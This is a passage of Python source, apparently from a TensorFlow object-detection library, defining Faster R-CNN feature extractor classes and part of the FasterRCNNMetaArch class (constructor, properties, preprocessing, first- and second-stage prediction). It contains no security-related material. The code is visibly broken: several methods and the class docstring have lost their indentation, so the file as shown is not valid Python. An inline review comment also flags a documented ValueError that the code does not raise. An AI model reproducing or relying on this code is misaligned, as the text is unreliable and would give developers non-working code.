      preprocessed_inputs: A [batch, height, width, channels] float tensor
        representing a batch of images.
      scope: A scope name.

    Returns:
      rpn_feature_map: A tensor with shape [batch, height, width, depth]
      activations: A dictionary mapping activation tensor names to tensors.
    """
    with tf.variable_scope(scope, values=[preprocessed_inputs]):
      return self._extract_proposal_features(preprocessed_inputs, scope)

  @abc.abstractmethod
  def _extract_proposal_features(self, preprocessed_inputs, scope):
    """Extracts first stage RPN features, to be overridden."""
    pass

  def extract_box_classifier_features(self, proposal_feature_maps, scope):
    """Extracts second stage box classifier features.

    Args:
      proposal_feature_maps: A 4-D float tensor with shape
        [batch_size * self.max_num_proposals, crop_height, crop_width, depth]
        representing the feature map cropped to each proposal.
      scope: A scope name.

    Returns:
      proposal_classifier_features: A 4-D float tensor with shape
        [batch_size * self.max_num_proposals, height, width, depth]
        representing box classifier features for each proposal.
    """
    # AUTO_REUSE lets repeated invocations (e.g. stage 2 and stage 3)
    # share the same classifier variables.
    with tf.variable_scope(
        scope, values=[proposal_feature_maps], reuse=tf.AUTO_REUSE):
      return self._extract_box_classifier_features(proposal_feature_maps,
                                                   scope)

  @abc.abstractmethod
  def _extract_box_classifier_features(self, proposal_feature_maps, scope):
    """Extracts second stage box classifier features, to be overridden."""
    pass

  def restore_from_classification_checkpoint_fn(
      self,
      first_stage_feature_extractor_scope,
      second_stage_feature_extractor_scope):
    """Returns a map of variables to load from a foreign checkpoint.

    Args:
      first_stage_feature_extractor_scope: A scope name for the first stage
        feature extractor.
      second_stage_feature_extractor_scope: A scope name for the second stage
        feature extractor.

    Returns:
      A dict mapping variable names (to load from a checkpoint) to variables in
      the model graph.
    """
    scopes = (first_stage_feature_extractor_scope,
              second_stage_feature_extractor_scope)
    variables_to_restore = {}
    for variable in variables_helper.get_global_variables_safely():
      for scope_name in scopes:
        if variable.op.name.startswith(scope_name):
          # Strip the model's scope prefix to recover the checkpoint name.
          checkpoint_var_name = variable.op.name.replace(scope_name + '/', '')
          variables_to_restore[checkpoint_var_name] = variable
    return variables_to_restore
class FasterRCNNKerasFeatureExtractor(object):
  """Keras-based Faster R-CNN Feature Extractor definition.

  Concrete extractors override `preprocess` and the two model-factory
  methods below.
  """

  def __init__(self,
               is_training,
               first_stage_features_stride,
               batch_norm_trainable=False,
               weight_decay=0.0):
    """Constructor.

    Args:
      is_training: A boolean indicating whether the training version of the
        computation graph should be constructed.
      first_stage_features_stride: Output stride of extracted RPN feature map.
      batch_norm_trainable: Whether to update batch norm parameters during
        training or not. When training with a relative large batch size
        (e.g. 8), it could be desirable to enable batch norm update.
      weight_decay: float weight decay for feature extractor (default: 0.0).
    """
    self._is_training = is_training
    self._first_stage_features_stride = first_stage_features_stride
    # Batch norm is only updated when it is both requested and training.
    self._train_batch_norm = batch_norm_trainable and is_training
    self._weight_decay = weight_decay

  @abc.abstractmethod
  def preprocess(self, resized_inputs):
    """Feature-extractor specific preprocessing (minus image resizing)."""
    pass

  @abc.abstractmethod
  def get_proposal_feature_extractor_model(self, name):
    """Get model that extracts first stage RPN features, to be overridden."""
    pass

  @abc.abstractmethod
  def get_box_classifier_feature_extractor_model(self, name):
    """Get model that extracts second stage box classifier features."""
    pass

  def restore_from_classification_checkpoint_fn(
      self,
      first_stage_feature_extractor_scope,
      second_stage_feature_extractor_scope):
    """Returns a map of variables to load from a foreign checkpoint.

    Args:
      first_stage_feature_extractor_scope: A scope name for the first stage
        feature extractor.
      second_stage_feature_extractor_scope: A scope name for the second stage
        feature extractor.

    Returns:
      A dict mapping variable names (to load from a checkpoint) to variables in
      the model graph.
    """
    scopes = (first_stage_feature_extractor_scope,
              second_stage_feature_extractor_scope)
    variables_to_restore = {}
    for variable in variables_helper.get_global_variables_safely():
      for scope_name in scopes:
        if variable.op.name.startswith(scope_name):
          # Strip the model's scope prefix to recover the checkpoint name.
          checkpoint_var_name = variable.op.name.replace(scope_name + '/', '')
          variables_to_restore[checkpoint_var_name] = variable
    return variables_to_restore
class FasterRCNNMetaArch(model.DetectionModel):
"""Faster R-CNN Meta-architecture definition."""
  def __init__(self,
               is_training,
               num_classes,
               image_resizer_fn,
               feature_extractor,
               number_of_stages,
               first_stage_anchor_generator,
               first_stage_target_assigner,
               first_stage_atrous_rate,
               first_stage_box_predictor_arg_scope_fn,
               first_stage_box_predictor_kernel_size,
               first_stage_box_predictor_depth,
               first_stage_minibatch_size,
               first_stage_sampler,
               first_stage_non_max_suppression_fn,
               first_stage_max_proposals,
               first_stage_localization_loss_weight,
               first_stage_objectness_loss_weight,
               crop_and_resize_fn,
               initial_crop_size,
               maxpool_kernel_size,
               maxpool_stride,
               second_stage_target_assigner,
               second_stage_mask_rcnn_box_predictor,
               second_stage_batch_size,
               second_stage_sampler,
               second_stage_non_max_suppression_fn,
               second_stage_score_conversion_fn,
               second_stage_localization_loss_weight,
               second_stage_classification_loss_weight,
               second_stage_classification_loss,
               second_stage_mask_prediction_loss_weight=1.0,
               hard_example_miner=None,
               parallel_iterations=16,
               add_summaries=True,
               clip_anchors_to_image=False,
               use_static_shapes=False,
               resize_masks=True,
               freeze_batchnorm=False,
               return_raw_detections_during_predict=False):
    """FasterRCNNMetaArch Constructor.
    Args:
      is_training: A boolean indicating whether the training version of the
        computation graph should be constructed.
      num_classes: Number of classes. Note that num_classes *does not*
        include the background category, so if groundtruth labels take values
        in {0, 1, .., K-1}, num_classes=K (and not K+1, even though the
        assigned classification targets can range from {0,... K}).
      image_resizer_fn: A callable for image resizing. This callable
        takes a rank-3 image tensor of shape [height, width, channels]
        (corresponding to a single image), an optional rank-3 instance mask
        tensor of shape [num_masks, height, width] and returns a resized rank-3
        image tensor, a resized mask tensor if one was provided in the input. In
        addition this callable must also return a 1-D tensor of the form
        [height, width, channels] containing the size of the true image, as the
        image resizer can perform zero padding. See protos/image_resizer.proto.
      feature_extractor: A FasterRCNNFeatureExtractor object.
      number_of_stages: An integer values taking values in {1, 2, 3}. If
        1, the function will construct only the Region Proposal Network (RPN)
        part of the model. If 2, the function will perform box refinement and
        other auxiliary predictions all in the second stage. If 3, it will
        extract features from refined boxes and perform the auxiliary
        predictions on the non-maximum suppressed refined boxes.
        If is_training is true and the value of number_of_stages is 3, it is
        reduced to 2 since all the model heads are trained in parallel in second
        stage during training.
      first_stage_anchor_generator: An anchor_generator.AnchorGenerator object
        (note that currently we only support
        grid_anchor_generator.GridAnchorGenerator objects)
      first_stage_target_assigner: Target assigner to use for first stage of
        Faster R-CNN (RPN).
      first_stage_atrous_rate: A single integer indicating the atrous rate for
        the single convolution op which is applied to the `rpn_features_to_crop`
        tensor to obtain a tensor to be used for box prediction. Some feature
        extractors optionally allow for producing feature maps computed at
        denser resolutions. The atrous rate is used to compensate for the
        denser feature maps by using an effectively larger receptive field.
        (This should typically be set to 1).
      first_stage_box_predictor_arg_scope_fn: Either a
        Keras layer hyperparams object or a function to construct tf-slim
        arg_scope for conv2d, separable_conv2d and fully_connected ops. Used
        for the RPN box predictor. If it is a keras hyperparams object the
        RPN box predictor will be a Keras model. If it is a function to
        construct an arg scope it will be a tf-slim box predictor.
      first_stage_box_predictor_kernel_size: Kernel size to use for the
        convolution op just prior to RPN box predictions.
      first_stage_box_predictor_depth: Output depth for the convolution op
        just prior to RPN box predictions.
      first_stage_minibatch_size: The "batch size" to use for computing the
        objectness and location loss of the region proposal network. This
        "batch size" refers to the number of anchors selected as contributing
        to the loss function for any given image within the image batch and is
        only called "batch_size" due to terminology from the Faster R-CNN paper.
      first_stage_sampler: Sampler to use for first stage loss (RPN loss).
      first_stage_non_max_suppression_fn: batch_multiclass_non_max_suppression
        callable that takes `boxes`, `scores` and optional `clip_window`(with
        all other inputs already set) and returns a dictionary containing
        tensors with keys: `detection_boxes`, `detection_scores`,
        `detection_classes`, `num_detections`. This is used to perform non max
        suppression on the boxes predicted by the Region Proposal Network
        (RPN).
        See `post_processing.batch_multiclass_non_max_suppression` for the type
        and shape of these tensors.
      first_stage_max_proposals: Maximum number of boxes to retain after
        performing Non-Max Suppression (NMS) on the boxes predicted by the
        Region Proposal Network (RPN).
      first_stage_localization_loss_weight: A float
      first_stage_objectness_loss_weight: A float
      crop_and_resize_fn: A differentiable resampler to use for cropping RPN
        proposal features.
      initial_crop_size: A single integer indicating the output size
        (width and height are set to be the same) of the initial bilinear
        interpolation based cropping during ROI pooling.
      maxpool_kernel_size: A single integer indicating the kernel size of the
        max pool op on the cropped feature map during ROI pooling.
      maxpool_stride: A single integer indicating the stride of the max pool
        op on the cropped feature map during ROI pooling.
      second_stage_target_assigner: Target assigner to use for second stage of
        Faster R-CNN. If the model is configured with multiple prediction heads,
        this target assigner is used to generate targets for all heads (with the
        correct `unmatched_class_label`).
      second_stage_mask_rcnn_box_predictor: Mask R-CNN box predictor to use for
        the second stage.
      second_stage_batch_size: The batch size used for computing the
        classification and refined location loss of the box classifier. This
        "batch size" refers to the number of proposals selected as contributing
        to the loss function for any given image within the image batch and is
        only called "batch_size" due to terminology from the Faster R-CNN paper.
      second_stage_sampler: Sampler to use for second stage loss (box
        classifier loss).
      second_stage_non_max_suppression_fn: batch_multiclass_non_max_suppression
        callable that takes `boxes`, `scores`, optional `clip_window` and
        optional (kwarg) `mask` inputs (with all other inputs already set)
        and returns a dictionary containing tensors with keys:
        `detection_boxes`, `detection_scores`, `detection_classes`,
        `num_detections`, and (optionally) `detection_masks`. See
        `post_processing.batch_multiclass_non_max_suppression` for the type and
        shape of these tensors.
      second_stage_score_conversion_fn: Callable elementwise nonlinearity
        (that takes tensors as inputs and returns tensors). This is usually
        used to convert logits to probabilities.
      second_stage_localization_loss_weight: A float indicating the scale factor
        for second stage localization loss.
      second_stage_classification_loss_weight: A float indicating the scale
        factor for second stage classification loss.
      second_stage_classification_loss: Classification loss used by the second
        stage classifier. Either losses.WeightedSigmoidClassificationLoss or
        losses.WeightedSoftmaxClassificationLoss.
      second_stage_mask_prediction_loss_weight: A float indicating the scale
        factor for second stage mask prediction loss. This is applicable only if
        second stage box predictor is configured to predict masks.
      hard_example_miner: A losses.HardExampleMiner object (can be None).
      parallel_iterations: (Optional) The number of iterations allowed to run
        in parallel for calls to tf.map_fn.
      add_summaries: boolean (default: True) controlling whether summary ops
        should be added to tensorflow graph.
      clip_anchors_to_image: Normally, anchors generated for a given image size
        are pruned during training if they lie outside the image window. This
        option clips the anchors to be within the image instead of pruning.
      use_static_shapes: If True, uses implementation of ops with static shape
        guarantees.
      resize_masks: Indicates whether the masks present in the groundtruth
        should be resized in the model with `image_resizer_fn`
      freeze_batchnorm: Whether to freeze batch norm parameters in the first
        stage box predictor during training or not. When training with a small
        batch size (e.g. 1), it is desirable to freeze batch norm update and
        use pretrained batch norm params.
      return_raw_detections_during_predict: Whether to return raw detection
        boxes in the predict() method. These are decoded boxes that have not
        been through postprocessing (i.e. NMS). Default False.
    Raises:
      ValueError: If `second_stage_batch_size` > `first_stage_max_proposals` at
        training time.
      ValueError: If first_stage_anchor_generator is not of type
        grid_anchor_generator.GridAnchorGenerator.
    """
    # TODO(rathodv): add_summaries is currently unused. Respect that directive
    # in the future.
    super(FasterRCNNMetaArch, self).__init__(num_classes=num_classes)
    if not isinstance(first_stage_anchor_generator,
                      grid_anchor_generator.GridAnchorGenerator):
      raise ValueError('first_stage_anchor_generator must be of type '
                       'grid_anchor_generator.GridAnchorGenerator.')
    self._is_training = is_training
    self._image_resizer_fn = image_resizer_fn
    self._resize_masks = resize_masks
    self._feature_extractor = feature_extractor
    if isinstance(feature_extractor, FasterRCNNKerasFeatureExtractor):
      # We delay building the feature extractor until it is used,
      # to avoid creating the variables when a model is built just for data
      # preprocessing. (This prevents a subtle bug where variable names are
      # mismatched across workers, causing only one worker to be able to train)
      self._feature_extractor_for_proposal_features = (
          _UNINITIALIZED_FEATURE_EXTRACTOR)
      self._feature_extractor_for_box_classifier_features = (
          _UNINITIALIZED_FEATURE_EXTRACTOR)
    else:
      self._feature_extractor_for_proposal_features = None
      self._feature_extractor_for_box_classifier_features = None
    self._number_of_stages = number_of_stages
    self._proposal_target_assigner = first_stage_target_assigner
    self._detector_target_assigner = second_stage_target_assigner
    # Both proposal and detector target assigners use the same box coder
    self._box_coder = self._proposal_target_assigner.box_coder
    # (First stage) Region proposal network parameters
    self._first_stage_anchor_generator = first_stage_anchor_generator
    self._first_stage_atrous_rate = first_stage_atrous_rate
    self._first_stage_box_predictor_depth = first_stage_box_predictor_depth
    self._first_stage_box_predictor_kernel_size = (
        first_stage_box_predictor_kernel_size)
    self._first_stage_minibatch_size = first_stage_minibatch_size
    self._first_stage_sampler = first_stage_sampler
    # The RPN first conv + box predictor are built as Keras layers when a
    # KerasLayerHyperparams object is supplied, otherwise as a tf-slim
    # box predictor with an arg_scope-producing callable.
    if isinstance(first_stage_box_predictor_arg_scope_fn,
                  hyperparams_builder.KerasLayerHyperparams):
      num_anchors_per_location = (
          self._first_stage_anchor_generator.num_anchors_per_location())
      if len(num_anchors_per_location) != 1:
        raise ValueError('anchor_generator is expected to generate anchors '
                         'corresponding to a single feature map.')
      conv_hyperparams = (
          first_stage_box_predictor_arg_scope_fn)
      self._first_stage_box_predictor_first_conv = (
          tf.keras.Sequential([
              tf.keras.layers.Conv2D(
                  self._first_stage_box_predictor_depth,
                  kernel_size=[self._first_stage_box_predictor_kernel_size,
                               self._first_stage_box_predictor_kernel_size],
                  dilation_rate=self._first_stage_atrous_rate,
                  padding='SAME',
                  name='RPNConv',
                  **conv_hyperparams.params()),
              conv_hyperparams.build_batch_norm(
                  (self._is_training and not freeze_batchnorm),
                  name='RPNBatchNorm'),
              tf.keras.layers.Lambda(
                  tf.nn.relu6,
                  name='RPNActivation')
          ], name='FirstStageRPNFeatures'))
      self._first_stage_box_predictor = (
          box_predictor_builder.build_convolutional_keras_box_predictor(
              is_training=self._is_training,
              num_classes=1,
              conv_hyperparams=conv_hyperparams,
              freeze_batchnorm=freeze_batchnorm,
              inplace_batchnorm_update=False,
              num_predictions_per_location_list=num_anchors_per_location,
              use_dropout=False,
              dropout_keep_prob=1.0,
              box_code_size=self._box_coder.code_size,
              kernel_size=1,
              num_layers_before_predictor=0,
              min_depth=0,
              max_depth=0,
              name=self.first_stage_box_predictor_scope))
    else:
      self._first_stage_box_predictor_arg_scope_fn = (
          first_stage_box_predictor_arg_scope_fn)
      def rpn_box_predictor_feature_extractor(rpn_features_to_crop):
        with slim.arg_scope(self._first_stage_box_predictor_arg_scope_fn()):
          reuse = tf.get_variable_scope().reuse
          return slim.conv2d(
              rpn_features_to_crop,
              self._first_stage_box_predictor_depth,
              kernel_size=[self._first_stage_box_predictor_kernel_size,
                           self._first_stage_box_predictor_kernel_size],
              rate=self._first_stage_atrous_rate,
              activation_fn=tf.nn.relu6,
              scope='Conv',
              reuse=reuse)
      self._first_stage_box_predictor_first_conv = (
          rpn_box_predictor_feature_extractor)
      self._first_stage_box_predictor = (
          box_predictor_builder.build_convolutional_box_predictor(
              is_training=self._is_training,
              num_classes=1,
              conv_hyperparams_fn=self._first_stage_box_predictor_arg_scope_fn,
              use_dropout=False,
              dropout_keep_prob=1.0,
              box_code_size=self._box_coder.code_size,
              kernel_size=1,
              num_layers_before_predictor=0,
              min_depth=0,
              max_depth=0))
    # First stage NMS and loss configuration.
    self._first_stage_nms_fn = first_stage_non_max_suppression_fn
    self._first_stage_max_proposals = first_stage_max_proposals
    self._use_static_shapes = use_static_shapes
    self._first_stage_localization_loss = (
        losses.WeightedSmoothL1LocalizationLoss())
    self._first_stage_objectness_loss = (
        losses.WeightedSoftmaxClassificationLoss())
    self._first_stage_loc_loss_weight = first_stage_localization_loss_weight
    self._first_stage_obj_loss_weight = first_stage_objectness_loss_weight
    # Per-region cropping parameters
    self._crop_and_resize_fn = crop_and_resize_fn
    self._initial_crop_size = initial_crop_size
    self._maxpool_kernel_size = maxpool_kernel_size
    self._maxpool_stride = maxpool_stride
    # If max pooling is to be used, build the layer
    if maxpool_kernel_size:
      self._maxpool_layer = tf.keras.layers.MaxPooling2D(
          [self._maxpool_kernel_size, self._maxpool_kernel_size],
          strides=self._maxpool_stride,
          name='MaxPool2D')
    # (Second stage) box classifier parameters
    self._mask_rcnn_box_predictor = second_stage_mask_rcnn_box_predictor
    self._second_stage_batch_size = second_stage_batch_size
    self._second_stage_sampler = second_stage_sampler
    self._second_stage_nms_fn = second_stage_non_max_suppression_fn
    self._second_stage_score_conversion_fn = second_stage_score_conversion_fn
    self._second_stage_localization_loss = (
        losses.WeightedSmoothL1LocalizationLoss())
    self._second_stage_classification_loss = second_stage_classification_loss
    self._second_stage_mask_loss = (
        losses.WeightedSigmoidClassificationLoss())
    self._second_stage_loc_loss_weight = second_stage_localization_loss_weight
    self._second_stage_cls_loss_weight = second_stage_classification_loss_weight
    self._second_stage_mask_loss_weight = (
        second_stage_mask_prediction_loss_weight)
    self._hard_example_miner = hard_example_miner
    self._parallel_iterations = parallel_iterations
    self.clip_anchors_to_image = clip_anchors_to_image
    # NOTE(review): the docstring advertises a ValueError when
    # second_stage_batch_size > first_stage_max_proposals at training time,
    # but no such check appears here — presumably enforced elsewhere; verify.
    if self._number_of_stages <= 0 or self._number_of_stages > 3:
      raise ValueError('Number of stages should be a value in {1, 2, 3}.')
    self._batched_prediction_tensor_names = []
    self._return_raw_detections_during_predict = (
        return_raw_detections_during_predict)
  @property
  def first_stage_feature_extractor_scope(self):
    """Variable scope name used for the first stage feature extractor."""
    return 'FirstStageFeatureExtractor'
  @property
  def second_stage_feature_extractor_scope(self):
    """Variable scope name used for the second stage feature extractor."""
    return 'SecondStageFeatureExtractor'
  @property
  def first_stage_box_predictor_scope(self):
    """Variable scope name used for the first stage (RPN) box predictor."""
    return 'FirstStageBoxPredictor'
  @property
  def second_stage_box_predictor_scope(self):
    """Variable scope name used for the second stage box predictor."""
    return 'SecondStageBoxPredictor'
@property
def max_num_proposals(self):
"""Max number of proposals (to pad to) for each image in the input batch.
At training time, this is set to be the `second_stage_batch_size` if hard
example miner is not configured, else it is set to
`first_stage_max_proposals`. At inference time, this is always set to
`first_stage_max_proposals`.
Returns:
A positive integer.
"""
if self._is_training and not self._hard_example_miner:
return self._second_stage_batch_size
return self._first_stage_max_proposals
@property
def anchors(self):
if not self._anchors:
raise RuntimeError('anchors have not been constructed yet!')
if not isinstance(self._anchors, box_list.BoxList):
raise RuntimeError('anchors should be a BoxList object, but is not.')
return self._anchors
@property
def batched_prediction_tensor_names(self):
if not self._batched_prediction_tensor_names:
raise RuntimeError('Must call predict() method to get batched prediction '
'tensor names.')
return self._batched_prediction_tensor_names
def preprocess(self, inputs):
"""Feature-extractor specific preprocessing.
See base class.
For Faster R-CNN, we perform image resizing in the base class --- each
class subclassing FasterRCNNMetaArch is responsible for any additional
preprocessing (e.g., scaling pixel values to be in [-1, 1]).
Args:
inputs: a [batch, height_in, width_in, channels] float tensor representing
a batch of images with values between 0 and 255.0.
Returns:
preprocessed_inputs: a [batch, height_out, width_out, channels] float
tensor representing a batch of images.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Raises:
ValueError: if inputs tensor does not have type tf.float32
"""
with tf.name_scope('Preprocessor'):
(resized_inputs,
true_image_shapes) = shape_utils.resize_images_and_return_shapes(
inputs, self._image_resizer_fn)
return (self._feature_extractor.preprocess(resized_inputs),
true_image_shapes)
def _compute_clip_window(self, image_shapes):
"""Computes clip window for non max suppression based on image shapes.
This function assumes that the clip window's left top corner is at (0, 0).
Args:
image_shapes: A 2-D int32 tensor of shape [batch_size, 3] containing
shapes of images in the batch. Each row represents [height, width,
channels] of an image.
Returns:
A 2-D float32 tensor of shape [batch_size, 4] containing the clip window
for each image in the form [ymin, xmin, ymax, xmax].
"""
clip_heights = image_shapes[:, 0]
clip_widths = image_shapes[:, 1]
clip_window = tf.cast(
tf.stack([
tf.zeros_like(clip_heights),
tf.zeros_like(clip_heights), clip_heights, clip_widths
],
axis=1),
dtype=tf.float32)
return clip_window
def _proposal_postprocess(self, rpn_box_encodings,
rpn_objectness_predictions_with_background, anchors,
image_shape, true_image_shapes):
"""Wraps over FasterRCNNMetaArch._postprocess_rpn()."""
image_shape_2d = self._image_batch_shape_2d(image_shape)
proposal_boxes_normalized, _, _, num_proposals, _, _ = \
self._postprocess_rpn(
rpn_box_encodings, rpn_objectness_predictions_with_background,
anchors, image_shape_2d, true_image_shapes)
return proposal_boxes_normalized, num_proposals
  def predict(self, preprocessed_inputs, true_image_shapes):
    """Predicts unpostprocessed tensors from input tensor.
    This function takes an input batch of images and runs it through the
    forward pass of the network to yield "raw" un-postprocessed predictions.
    If `number_of_stages` is 1, this function only returns first stage
    RPN predictions (un-postprocessed). Otherwise it returns both
    first stage RPN predictions as well as second stage box classifier
    predictions.
    Other remarks:
    + Anchor pruning vs. clipping: following the recommendation of the Faster
    R-CNN paper, we prune anchors that venture outside the image window at
    training time and clip anchors to the image window at inference time.
    + Proposal padding: as described at the top of the file, proposals are
    padded to self._max_num_proposals and flattened so that proposals from all
    images within the input batch are arranged along the same batch dimension.
    Args:
      preprocessed_inputs: a [batch, height, width, channels] float tensor
        representing a batch of images.
      true_image_shapes: int32 tensor of shape [batch, 3] where each row is
        of the form [height, width, channels] indicating the shapes
        of true images in the resized images, as resized images can be padded
        with zeros.
    Returns:
      prediction_dict: a dictionary holding "raw" prediction tensors:
        1) rpn_box_predictor_features: A 4-D float32 tensor with shape
          [batch_size, height, width, depth] to be used for predicting proposal
          boxes and corresponding objectness scores.
        2) rpn_features_to_crop: A 4-D float32 tensor with shape
          [batch_size, height, width, depth] representing image features to crop
          using the proposal boxes predicted by the RPN.
        3) image_shape: a 1-D tensor of shape [4] representing the input
          image shape.
        4) rpn_box_encodings:  3-D float tensor of shape
          [batch_size, num_anchors, self._box_coder.code_size] containing
          predicted boxes.
        5) rpn_objectness_predictions_with_background: 3-D float tensor of shape
          [batch_size, num_anchors, 2] containing class
          predictions (logits) for each of the anchors.  Note that this
          tensor *includes* background class predictions (at class index 0).
        6) anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
          for the first stage RPN (in absolute coordinates).  Note that
          `num_anchors` can differ depending on whether the model is created in
          training or inference mode.
        7) feature_maps: A single element list containing a 4-D float32 tensor
          with shape batch_size, height, width, depth] representing the RPN
          features to crop.
        (and if number_of_stages > 1):
        8) refined_box_encodings: a 3-D tensor with shape
          [total_num_proposals, num_classes, self._box_coder.code_size]
          representing predicted (final) refined box encodings, where
          total_num_proposals=batch_size*self._max_num_proposals. If using
          a shared box across classes the shape will instead be
          [total_num_proposals, 1, self._box_coder.code_size].
        9) class_predictions_with_background: a 3-D tensor with shape
          [total_num_proposals, num_classes + 1] containing class
          predictions (logits) for each of the anchors, where
          total_num_proposals=batch_size*self._max_num_proposals.
          Note that this tensor *includes* background class predictions
          (at class index 0).
        10) num_proposals: An int32 tensor of shape [batch_size] representing
          the number of proposals generated by the RPN.  `num_proposals` allows
          us to keep track of which entries are to be treated as zero paddings
          and which are not since we always pad the number of proposals to be
          `self.max_num_proposals` for each image.
        11) proposal_boxes: A float32 tensor of shape
          [batch_size, self.max_num_proposals, 4] representing
          decoded proposal bounding boxes in absolute coordinates.
        12) mask_predictions: (optional) a 4-D tensor with shape
          [total_num_padded_proposals, num_classes, mask_height, mask_width]
          containing instance mask predictions.
        13) raw_detection_boxes: (optional) a
          [batch_size, self.max_num_proposals, num_classes, 4] float32 tensor
          with detections prior to NMS in normalized coordinates.
        14) raw_detection_feature_map_indices: (optional) a
          [batch_size, self.max_num_proposals, num_classes] int32 tensor with
          indices indicating which feature map each raw detection box was
          produced from. The indices correspond to the elements in the
          'feature_maps' field.
    Raises:
      ValueError: If `predict` is called before `preprocess`.
    """
    # Stage 1: run the RPN to get proposal box encodings + objectness logits.
    prediction_dict = self._predict_first_stage(preprocessed_inputs)
    # Stage 2: crop proposal features and run the box classifier / refiner.
    if self._number_of_stages >= 2:
      prediction_dict.update(
          self._predict_second_stage(
              prediction_dict['rpn_box_encodings'],
              prediction_dict['rpn_objectness_predictions_with_background'],
              prediction_dict['rpn_features_to_crop'],
              prediction_dict['anchors'],
              prediction_dict['image_shape'],
              true_image_shapes))
    # Stage 3: predict instance masks on top of the refined detections.
    if self._number_of_stages == 3:
      prediction_dict = self._predict_third_stage(prediction_dict,
                                                  true_image_shapes)
    # 'image_shape' and 'anchors' are not per-image batched tensors, so they
    # are excluded from the recorded batched prediction tensor names.
    self._batched_prediction_tensor_names = [
        x for x in prediction_dict if x not in ('image_shape', 'anchors')
    ]
    return prediction_dict
  def _predict_first_stage(self, preprocessed_inputs):
    """First stage of prediction.
    Args:
      preprocessed_inputs: a [batch, height, width, channels] float tensor
        representing a batch of images.
    Returns:
      prediction_dict: a dictionary holding "raw" prediction tensors:
        1) rpn_box_predictor_features: A 4-D float32/bfloat16 tensor with shape
          [batch_size, height, width, depth] to be used for predicting proposal
          boxes and corresponding objectness scores.
        2) rpn_features_to_crop: A 4-D float32/bfloat16 tensor with shape
          [batch_size, height, width, depth] representing image features to crop
          using the proposal boxes predicted by the RPN.
        3) image_shape: a 1-D tensor of shape [4] representing the input
          image shape.
        4) rpn_box_encodings:  3-D float32 tensor of shape
          [batch_size, num_anchors, self._box_coder.code_size] containing
          predicted boxes.
        5) rpn_objectness_predictions_with_background: 3-D float32 tensor of
          shape [batch_size, num_anchors, 2] containing class predictions
          (logits) for each of the anchors.  Note that this tensor *includes*
          background class predictions (at class index 0).
        6) anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
          for the first stage RPN (in absolute coordinates).  Note that
          `num_anchors` can differ depending on whether the model is created in
          training or inference mode.
        7) feature_maps: A single element list containing a 4-D float32 tensor
          with shape batch_size, height, width, depth] representing the RPN
          features to crop.
    """
    (rpn_box_predictor_features, rpn_features_to_crop, anchors_boxlist,
     image_shape) = self._extract_rpn_feature_maps(preprocessed_inputs)
    (rpn_box_encodings, rpn_objectness_predictions_with_background
    ) = self._predict_rpn_proposals(rpn_box_predictor_features)
    # The Faster R-CNN paper recommends pruning anchors that venture outside
    # the image window at training time and clipping at inference time.
    clip_window = tf.cast(tf.stack([0, 0, image_shape[1], image_shape[2]]),
                          dtype=tf.float32)
    if self._is_training:
      if self.clip_anchors_to_image:
        # Optionally clip (rather than prune) at training time too; clipped
        # anchors keep their slots so predictions need no filtering.
        anchors_boxlist = box_list_ops.clip_to_window(
            anchors_boxlist, clip_window, filter_nonoverlapping=False)
      else:
        # Pruning removes anchors, so the corresponding box encodings and
        # objectness predictions must be removed alongside them.
        (rpn_box_encodings, rpn_objectness_predictions_with_background,
         anchors_boxlist) = self._remove_invalid_anchors_and_predictions(
             rpn_box_encodings, rpn_objectness_predictions_with_background,
             anchors_boxlist, clip_window)
    else:
      anchors_boxlist = box_list_ops.clip_to_window(
          anchors_boxlist, clip_window,
          filter_nonoverlapping=not self._use_static_shapes)
    self._anchors = anchors_boxlist
    prediction_dict = {
        'rpn_box_predictor_features':
            rpn_box_predictor_features,
        'rpn_features_to_crop':
            rpn_features_to_crop,
        'image_shape':
            image_shape,
        # Predictions may be bfloat16 (see docstring); expose float32 to
        # downstream consumers.
        'rpn_box_encodings':
            tf.cast(rpn_box_encodings, dtype=tf.float32),
        'rpn_objectness_predictions_with_background':
            tf.cast(rpn_objectness_predictions_with_background,
                    dtype=tf.float32),
        'anchors':
            anchors_boxlist.data['boxes'],
        fields.PredictionFields.feature_maps: [rpn_features_to_crop]
    }
    return prediction_dict
def _image_batch_shape_2d(self, image_batch_shape_1d):
"""Takes a 1-D image batch shape tensor and converts it to a 2-D tensor.
Example:
If 1-D image batch shape tensor is [2, 300, 300, 3]. The corresponding 2-D
image batch tensor would be [[300, 300, 3], [300, 300, 3]]
Args:
image_batch_shape_1d: 1-D tensor of the form [batch_size, height,
width, channels].
Returns:
image_batch_shape_2d: 2-D tensor of shape [batch_size, 3] were each row is
of the form [height, width, channels].
"""
return tf.tile(tf.expand_dims(image_batch_shape_1d[1:], 0),
[image_batch_shape_1d[0], 1])
  def _predict_second_stage(self, rpn_box_encodings,
                            rpn_objectness_predictions_with_background,
                            rpn_features_to_crop,
                            anchors,
                            image_shape,
                            true_image_shapes):
    """Predicts the output tensors from second stage of Faster R-CNN.
    Args:
      rpn_box_encodings: 4-D float tensor of shape
        [batch_size, num_valid_anchors, self._box_coder.code_size] containing
        predicted boxes.
      rpn_objectness_predictions_with_background: 2-D float tensor of shape
        [batch_size, num_valid_anchors, 2] containing class
        predictions (logits) for each of the anchors.  Note that this
        tensor *includes* background class predictions (at class index 0).
      rpn_features_to_crop: A 4-D float32 or bfloat16 tensor with shape
        [batch_size, height, width, depth] representing image features to crop
        using the proposal boxes predicted by the RPN.
      anchors: 2-D float tensor of shape
        [num_anchors, self._box_coder.code_size].
      image_shape: A 1D int32 tensors of size [4] containing the image shape.
      true_image_shapes: int32 tensor of shape [batch, 3] where each row is
        of the form [height, width, channels] indicating the shapes
        of true images in the resized images, as resized images can be padded
        with zeros.
    Returns:
      prediction_dict: a dictionary holding "raw" prediction tensors:
        1) refined_box_encodings: a 3-D float32 tensor with shape
          [total_num_proposals, num_classes, self._box_coder.code_size]
          representing predicted (final) refined box encodings, where
          total_num_proposals=batch_size*self._max_num_proposals. If using a
          shared box across classes the shape will instead be
          [total_num_proposals, 1, self._box_coder.code_size].
        2) class_predictions_with_background: a 3-D float32 tensor with shape
          [total_num_proposals, num_classes + 1] containing class
          predictions (logits) for each of the anchors, where
          total_num_proposals=batch_size*self._max_num_proposals.
          Note that this tensor *includes* background class predictions
          (at class index 0).
        3) num_proposals: An int32 tensor of shape [batch_size] representing the
          number of proposals generated by the RPN.  `num_proposals` allows us
          to keep track of which entries are to be treated as zero paddings and
